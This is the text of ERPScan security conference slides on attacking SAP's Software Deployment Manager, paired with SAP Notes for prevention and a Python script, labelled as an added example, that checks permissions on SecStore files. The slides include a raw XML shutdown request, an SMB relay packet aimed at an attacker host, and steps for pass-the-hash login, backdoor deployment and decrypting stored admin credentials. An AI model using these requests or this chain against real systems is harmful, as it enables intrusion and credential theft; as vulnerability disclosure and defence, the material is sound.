Invest in security to secure investments
Injecting evil code in your SAP J2EE systems: Security of SAP Software Deployment Server
Alexander Polyakov, CTO
Dmitry Chastukhin, Director of SAP pentest/research team
ERPScan
Alexander Polyakov
• CTO of the ERPScan company
• EAS-SEC.org project leader
• Business application security expert
• R&D Professional of the year by Network Products Guide
• Organizer of ZeroNights conference
Twitter: @sh2kerr
erpscan.com 2 ERPScan — invest in security to secure investments
Dmitry Chastukhin
• Business application security expert
• Yet another security researcher
ERPScan: innovative company
• Developing software for SAP security monitoring
• Providing SAP/ERP security trainings and consulting
• Invited to talk at more than 40 key security conferences worldwide (BlackHat, RSA, Defcon, HITB)
• First to develop software for NetWeaver J2EE assessment
Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, accumulating their knowledge on SAP research.
Leading SAP AG partner in the field of discovering security vulnerabilities by the number of found vulnerabilities (25 %)
SAP
• The most popular business application
• More than 250000 customers worldwide
• 83 % of Forbes 500 companies run SAP
• Main system – ERP
• 3 platforms
‒ NetWeaver ABAP
‒ NetWeaver J2EE
‒ BusinessObjects
SAP insecurity
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing supplier and customer lists
• Stealing HR data
Fraud
• False transactions
• Modification of master data
Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations
SAP vulnerabilities
[Chart: number of SAP vulnerabilities per year, 2001 to 2014; y-axis 0 to 900]
More than 2800 in total
Source: SAP Security in Figures
Is it remotely exploitable?
> 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SAP Host Control, etc.
sapscan.com
What about other services?
[Chart: y-axis 0 to 9, one bar per service: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]
Source: SAP Security in Figures
SAP application servers
• SAP NetWeaver ABAP
• SAP NetWeaver J2EE
– SAP Portal
– SAP Solution Manager
– SAP NetWeaver Development Infrastructure (NWDI)
• SAP BusinessObjects
• SAP HANA Extended Application Services
• SAP SUP
• SAP Fiori
SAP NetWeaver development infrastructure
• Design Time Repository (DTR)
• Component Build Service (CBS)
• Change Management Service (CMS)
• Software Landscape Directory (SLD) / NS
• Software Deployment Manager (SDM)
Software Deployment Manager
• Single interface for the deployment
• Deploy apps (*.ear, *.war, *.sda)
• Implement custom patches
SDM server
• Different server modes
– Standalone
– Integrated
• Only one user at a time
• Only the hardcoded admin user
• Three ports:
– 50017 – Admin Port
– 50018 – GUI Port
– 50019 – HTTP Port
SDM client
• Browsing the distribution of deployed components
• Deploying and undeploying
• Log viewing
SDM attack intro
• SAP infrastructure includes many Java services
• Almost all Java stuff uses UME
• Universal user with a password
• Only one user at a time
• Ability to deploy evil code => plus, see point 1
SDM attack intro
• Thick client Java application (sad story)
• Scarce communication settings
• Difficult to intercept
• Custom protocols
SDM attack intro
• SAP has its own SAP Java Virtual Machine (JVM)
• Java 6 has the Attach API
• Attach to another running JVM
• Intercept and modify calls
Attack SAP SDM. DoS
• If an attacker uses an incorrect password 3 times, the server will shut down automatically
• Also, if you send this request, you can shut down the SDM server manually:
[10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest>
Attacking SAP SDM. SMB relay
Packet:
[10 spaces]<?xml version="1.0"?> <FileAccessRequest f="\\ip_addr\blabla"> </FileAccessRequest>
An old trick, but sometimes it's very useful
Prevention
• Install Note 1724516
• Enable the security features of SDM
• SDM server and SDM client need to be updated
https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
From Nobody to Administrator
Now, I will show an interesting attack
Compromise some SAP services
Compromise SAP SDM
Compromise SAP server OS
Compromise SAP
SDM authentication abuse
• OK. Let's see how authentication in SDM works:
– User enters password
– Hash is calculated locally on the client
– Password hash is sent to the server
– Hash is compared to the hash from the configuration file
Pass-the-hash attack here!
SDM authentication abuse
RootFrame.class
…\SDM\program\config\sdmrepository.sdc
Attack on SAP SDM
Read sdmrepository.sdc
Get password hash
Use hash as password to authenticate on the SDM server
Deploy backdoor on the SAP server
PROFIT!
File read
• OS command execution through CTC (Notes 1467771, 1445998)
• XML External Entities (Note 1619539)
• Directory Traversal (Note 1630293)
• Through MMC file read function (Notes 927637 and 1439348)
We have something new for you :)
SAP LogViewer standalone
• Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket)
• You can:
– View log on local server
– View log on remote server
– Register file as log file
Read log file without authentication!
SAP LogViewer standalone
Attack is pretty easy
Connect to LogViewer standalone server
Register sdmrepository.sdc file as log file
Read it
SAP LogViewer standalone
When we have a password hash, we can use it as the password to authenticate on the SDM server
Prevention
• Install Note 1685106
• Enable the security features of the Standalone LogViewer Server and client
• LogViewer server and client need to be updated
SDM intrusion
Full info about the SDM repository
Bypassing SDM restrictions
• Observe all server directories
• Read arbitrary files via LogViewer
SDM undeploying
Undeploy any application
SDM backdooring
Deploy any application
SDM backdooring
• before
• after
SDM post-exploitation
Prevention
• Install Note 1724516
• Enable the security features of SDM
• SDM server and SDM client need to be updated
https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
"The Software Deployment Manager (SDM) uses the database connection information, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as software deployment and undeployment."
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
Wow! J2EE Engine administrator user and password
Where is all this stuff located?
SAP SecStore
SAP SecStore
"By default, the J2EE Engine stores secure data in the file \usr\sap\<SID>\SYS\global\security\data\SecStore.properties in the file system."
"The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm."
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
OK. Let's try to read SecStore.properties
SAP SecStore
• We can execute any OS command (we have our backdoor)
• We know the SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
• It's all that we need
SecStore.properties (contents as shown on the slide):
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
But where is the key?
Get the password
• We have an encrypted password
• We have a key to decrypt it
We got the J2EE admin and JDBC login:password!
Prevention
Restrict read access to the files SecStore.properties and SecStore.key
http://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
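One way to verify that this restriction actually holds is a small permission audit of the two files; the check below is an added example, not ERPScan's or SAP's code, and it assumes a POSIX file system and that the directory passed in is the ...\SYS\global\security\data directory named above (the demo uses a constructed temporary directory instead).

```python
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# The two files the SAP help page says must not be readable by others.
SECSTORE_FILES = ("SecStore.properties", "SecStore.key")


def check_secstore_perms(directory: str, owner_uid: Optional[int] = None) -> Dict[str, List[str]]:
    """Return {filename: findings}; an empty findings list means the file is OK.

    Flags a file that is missing, readable or writable by group/others, or
    (when owner_uid is given) owned by a different user than expected."""
    findings: Dict[str, List[str]] = {}
    for name in SECSTORE_FILES:
        path = Path(directory) / name
        problems: List[str] = []
        if not path.exists():
            problems.append("missing")
        else:
            st = path.stat()
            if st.st_mode & stat.S_IRGRP:
                problems.append("group-readable")
            if st.st_mode & stat.S_IROTH:
                problems.append("world-readable")
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                problems.append("group/world-writable")
            if owner_uid is not None and st.st_uid != owner_uid:
                problems.append(f"owned by uid {st.st_uid}, expected {owner_uid}")
        findings[name] = problems
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed sample: SecStore.properties left at 0644 (weak),
    SecStore.key locked down to 0600 (as the hardening guide intends)."""
    d = tempfile.mkdtemp()
    props = Path(d) / "SecStore.properties"
    props.write_text("$internal/mode=encrypted\n")  # constructed placeholder content
    os.chmod(props, 0o644)
    key = Path(d) / "SecStore.key"
    key.write_bytes(b"constructed-key-bytes")  # constructed placeholder, not a real key
    os.chmod(key, 0o600)
    return check_secstore_perms(d, owner_uid=os.getuid())


if __name__ == "__main__":
    for fname, problems in demo().items():
        print(fname, "OK" if not problems else ", ".join(problems))
```

Run it against the real directory as the SAP administrator (<sid>adm) and any non-empty findings list is a file that should be tightened.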
Post-exploitation
SDM hacking demo
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
SAP Guides
It’s all in your hands
Regular security assessments
ABAP code review
Monitoring technical security
Segregation of Duties
Security events monitoring
Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations.
Web: www.erpscan.com
e-mail: [email protected]
Twitter: @erpscan @_chipik @sh2kerr